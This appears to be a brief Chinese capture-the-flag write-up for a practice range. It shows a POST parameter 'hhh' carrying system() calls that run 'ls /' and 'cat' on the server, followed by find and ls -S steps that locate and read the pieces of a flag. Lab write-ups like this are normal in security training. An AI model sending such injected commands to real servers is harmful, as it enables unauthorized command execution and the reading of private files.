image-20251224151741386

1.打开靶场post传参hhh=system(‘ls /‘);查看跟目录,看到README.txt

image-20251224151836284

2.cat /README.txt,得到flag位置image-20251224152828938

3.第一部分可以用find直接找到

image-20251224153012792

4.输入命令system(‘cat /tmp/secret/out/j/j/o/c/v/q/x/flag.txt’);

image-20251224153054804

5.接下来第二部分,先查看一下改文件夹的内容

ls /tmp/secret/out2/

image-20251224153217181

6.发现有非常多的文件夹,将所以文件夹按大小从大到小排序,发现685.txt

ls -S /tmp/secret/out2/

image-20251224153335509

7.打开得到flag最后一部分

image-20251224153521974